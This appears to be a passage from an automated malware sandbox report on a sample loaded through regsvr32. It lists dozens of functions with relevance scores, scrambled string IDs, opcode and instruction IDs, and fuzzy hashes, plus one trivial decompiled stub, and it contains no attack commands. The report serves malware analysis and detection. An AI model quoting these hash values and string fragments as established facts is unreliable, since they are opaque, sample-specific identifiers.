                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EF8C4 Relevance: 6.6, Strings: 5, Instructions: 393COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: G]W2$Uf$Wlw$X2D7$n
                                                                                                                                                                                                            • API String ID: 0-182303197
                                                                                                                                                                                                            • Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                                                                                                                            • Instruction ID: 78b9fb27f848f13fb930c9d7ae2bd24b734705d48061cf78a101b734d55189b4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38120570A04709EFDB58DF68C18A99EBBF1FF54308F408169E84AEB250D775DA18CB85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F5384 Relevance: 6.6, Strings: 5, Instructions: 313COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: GK$M/uB$Q|-$~~K$Bt$
                                                                                                                                                                                                            • API String ID: 0-557373213
                                                                                                                                                                                                            • Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                                                                                                                            • Instruction ID: 774f7a3e809a02a0a9d31ede4b7925d2d2eefd8e192c744b0b5f588dc5937873
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6E1F17550160CCBDFA8DF38C0994D93BE1FF58308F611229FC6AA62A2DB78D914CB49
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E8378 Relevance: 6.5, Strings: 5, Instructions: 238COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: .I$gBfh$i[$w|${
                                                                                                                                                                                                            • API String ID: 0-448909954
                                                                                                                                                                                                            • Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                                                                                                                            • Instruction ID: cb9f693eb8adcecd4fff79a655c7eb1389aa09b92b8087821c89981d08e221dd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12B114709247499FCF88DFA9D8898DEBBF1FB48304F40921DE816AB250C778A945CF95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F610C Relevance: 6.5, Strings: 5, Instructions: 208COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: cp$vm$x$zu$Kn#
                                                                                                                                                                                                            • API String ID: 0-3521309225
                                                                                                                                                                                                            • Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                                                                                                                            • Instruction ID: 1103de851daa5bf588f5b036f41e27703aec58d3df15b71a58fc3c5e4b9d88f5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06A113B4D143198FDB88CFA9D8898DEBBF0FB58318F108219E855B7290D3789945CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F7518 Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #0FQ$0T$C;$lXjD$tS
                                                                                                                                                                                                            • API String ID: 0-817034907
                                                                                                                                                                                                            • Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                                                                                                                            • Instruction ID: 2ada94d970c2c077678af7e0e886a3d44f33b8476a1d0e2acaa6de63e97e50e4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D41B2B180034E8FDB44CF64C88A4CE7FF0FB68398F215619E85AA6250D3B89694CFD5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E975C Relevance: 6.3, Strings: 5, Instructions: 77COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ,$3T$D-$Rc$l
                                                                                                                                                                                                            • API String ID: 0-617906138
                                                                                                                                                                                                            • Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                                                                                                                            • Instruction ID: 0225f655fd0b8d0d7990cdafe17fc8ac98479d33916384cd9a6bd55fa22bc2d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C41D5B081078E8FDF44CF68D88A4CE7BF0FB58358F104619EC69A6260D3B89664CF95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180001D98 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                            			E00000001180001D98(long long __rbx, long long _a32) {

				_a32 = __rbx;
			}



                                                                                                                                                                                                            0x180001d98

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                            • Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                                                                                                                            • Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FCF70 Relevance: 5.4, Strings: 4, Instructions: 410COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #X$ $UCV$y4.)
                                                                                                                                                                                                            • API String ID: 0-917551206
                                                                                                                                                                                                            • Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                                                                                                                            • Instruction ID: 8bea0df8071a4d5f516c1b3d17436cce75e639e174e7541bd436e9df47c343fa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3512E4B5A0470C9FDB58DFA8D08A5DDBBF2FB48348F00412AEA06E7290D7B5D909CB55
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E4EB8 Relevance: 5.4, Strings: 4, Instructions: 386COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #X$rq%$tL>$".
                                                                                                                                                                                                            • API String ID: 0-3922733902
                                                                                                                                                                                                            • Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                                                                                                                            • Instruction ID: 26bf2311638a9ba48a60747d11c00a1b59bd847b2d0116809fd1a31400d1bd48
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B822C1759096C88BDBF8DF24C8896CD37F0FF48348F90125AD84E9A654DBB86684CF42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FAD28 Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: g$-$HE$Vc
                                                                                                                                                                                                            • API String ID: 0-2562162751
                                                                                                                                                                                                            • Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                                                                                                                            • Instruction ID: fe15dbea848e6f24af7959287d533c22477cb444563e9f49f56ad028ab93cb91
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CA1D0B550478C9FDB88CF28D8894CD3BB2FB583A8F505219F84A97260D7B8D985CF85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E80CC Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: (;$*i$he$*%
                                                                                                                                                                                                            • API String ID: 0-35414758
                                                                                                                                                                                                            • Opcode ID: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                                                                                                                            • Instruction ID: b76c6960b3c686b241f8a5211dcf1bcc366d5ccee68d4d9f23844109941970c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE7114745147489BDF48CF28C88A5DD3BA1FB4836CF565329FC4AAA2A0D778D484CB89
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028ED474 Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: */$I$Yu$(
                                                                                                                                                                                                            • API String ID: 0-674225443
                                                                                                                                                                                                            • Opcode ID: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                                                                                                                            • Instruction ID: d481ce2d2ed7dd6ec23e75118e520065c2b3bfef67f497e4b24e0981e6aa7399
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA719DB580030ACFDB58CF68D48A5DE7FB0FB68398F204219E85596260D7B49AA5CFC4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E14D4 Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #X$.:$PYq|$W
                                                                                                                                                                                                            • API String ID: 0-626586655
                                                                                                                                                                                                            • Opcode ID: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                                                                                                                            • Instruction ID: 472b011e6758fc7fdb175c0716b7d764b40ed85a82f8b0c2e3c8ab1e9e2bb40a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD41037061CB848FD7A8DF28C58A65BBBF1FBD9704F804A1EE589C7290DB759804CB42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F4A90 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: -+$0u$S$e!
                                                                                                                                                                                                            • API String ID: 0-4217091389
                                                                                                                                                                                                            • Opcode ID: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                                                                                                                            • Instruction ID: d3ba53c82a7be11fe7ceef7c0e5ef2455852afa75db9a09d8cb96bbb16d2bbcb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A241E4B090474A8FDB48DF64C89A5DE7FF0FB68388F20461DF81AA6250D37496A4CBD5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EA660 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 5`$<ml$a:$P
                                                                                                                                                                                                            • API String ID: 0-330785107
                                                                                                                                                                                                            • Opcode ID: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                                                                                                                            • Instruction ID: bbdfbc93da4a963afbf07faa29596f78ff58d5f4ab87364be2f2f7e8703aed9a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF41F5B190074E8BDB48DF68C48A49E7FB1FB58348F10861DE85A9A390D7B89664CFC5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E3274 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: o$"B$SJ$wU
                                                                                                                                                                                                            • API String ID: 0-691100934
                                                                                                                                                                                                            • Opcode ID: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                                                                                                                            • Instruction ID: 3e72372266127c3631aa547ec3f641235b61b79cbd2cd35ffc0f13ebd12ae61f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E641D1B180078E8FDB48CF68C88A5DE7BF0FB58358F104619E859A6254D3B89695CFC5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E1B94 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 9luJ$=2y}$=2y}$b
                                                                                                                                                                                                            • API String ID: 0-1667874806
                                                                                                                                                                                                            • Opcode ID: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                                                                                                                            • Instruction ID: 2ea3090c0c259e62cb90672fe4cf4734fe067202274d6dc404e8614e50ac557a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC41D7B181039EDFDF44CF64D88A4CE7BB0FB18358F110A19E869A6264D3B89665CF85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E48FC Relevance: 4.0, Strings: 3, Instructions: 225COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ;$O,$fdu
                                                                                                                                                                                                            • API String ID: 0-1721916326
                                                                                                                                                                                                            • Opcode ID: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                                                                                                                            • Instruction ID: 7cf207294ab5403af1af446b1ee8018861380f64983cbc85fcbb8ea76ab4ff49
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2A11274D14718EBDF58DFA8E8C999DBBB1FB54318F00421AE81AE72A0CBB49945CF41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E3E0C Relevance: 3.9, Strings: 3, Instructions: 171COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: u$&v$f
                                                                                                                                                                                                            • API String ID: 0-1868853588
                                                                                                                                                                                                            • Opcode ID: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                                                                                                                            • Instruction ID: 3afa8740f3abf7df59baccbd8ec596445d42f2880559dd1d3f00cb5feccad3da
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD713275D04708ABCF1CDFA8E5895ADBBB1FB48318F10812DE416E72A0CB749945CF81
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FE750 Relevance: 3.9, Strings: 3, Instructions: 145COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: o$j$t
                                                                                                                                                                                                            • API String ID: 0-2067604139
                                                                                                                                                                                                            • Opcode ID: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                                                                                                                            • Instruction ID: c0625a8cdc1230a5c3f885e68dfa253b074a2892d9fee5df06bf4c67b1a2c889
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE61E0756087848BD368DF28C19A55FBBF1FBC6704F104A1DE68A8B2A0D77AD944CB43
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F8BB8 Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
